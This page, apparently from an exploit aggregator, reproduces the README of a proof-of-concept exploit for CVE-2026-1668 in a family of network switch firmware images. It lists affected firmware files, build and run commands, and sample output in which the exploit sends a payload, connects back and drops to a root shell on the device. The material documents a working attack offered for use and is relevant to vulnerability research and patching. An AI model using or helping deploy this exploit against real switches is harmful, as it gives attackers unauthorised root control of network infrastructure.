## https://sploitus.com/exploit?id=70B99AE5-E0FF-5D65-A8DD-E5F65C4576DB
# Proof-of-concept exploit for CVE-2026-1668
This is a proof-of-concept exploit for CVE-2026-1668. It is intended purely for educational purposes only. Please do not attempt to exploit systems that you do not own or do not have explicit permission to exploit.
This proof-of-concept was developed against a firmware image with the following SHA256 hash: `4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544`.
Names of firmwares known to match that hash (non-exhaustive):
* SG2005P-PDv1_en_1.0.16_[20251031-rel72837]_up.bin
* SG2008Pv3_en_3.20.14_[20251031-rel72837]_up.bin
* SG2008v4_en_4.20.14_[20251031-rel72837]_up.bin
* SG2016Pv1_en_1.20.14_[20251031-rel72837]_up.bin
* SG2210MPv4_en_4.20.15_[20251031-rel72837]_up.bin
* SG2210MPv5_en_5.0.12_[20251031-rel72837]_up.bin
* SG2210Pv5_en_5.20.15_[20251031-rel72837]_up.bin
* SG2218Pv1_en_1.20.14_[20251031-rel72837]_up.bin
* SG2218Pv2_en_2.0.11_[20251031-rel72837]_up.bin
* SG2218v1_en_1.20.14_[20251031-rel72837]_up.bin
* SG2428LPv1_en_1.0.12_[20251031-rel72837]_up.bin
* SG2428Pv5_en_5.20.17_[20251031-rel72837]_up.bin
* SG2428Pv5_en_5.30.13_[20251031-rel72837]_up.bin
* SG3210v3_en_3.20.14_[20251031-rel72837]_up.bin
* SL2428Pv6_en_6.20.15_[20251031-rel72837]_up.bin
* TL-SG2428Pv4_en_4.0.23_[20251031-rel72837]_up.bin
Earlier firmware versions are likely also vulnerable, but may require minor changes to the exploit payload.
Explanation of how the payload works can be found in this [blog post](https://blog.tangrs.id.au/2026/04/06/exploiting-cve-2026-1668-part-3/).
## Building
A MIPS Linux GCC toolchain is required to build the payload. On Ubuntu 24.04, one can be installed with `sudo apt install gcc-mips-linux-gnu`.
```shell
$ make
```
## Running
This exploit must be run before the HTTP server has served its first request (i.e on a fresh boot).
```shell
$ ./run.sh
```
The script should drop you to a root shell. If not, the exploit has failed.
```text
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #
```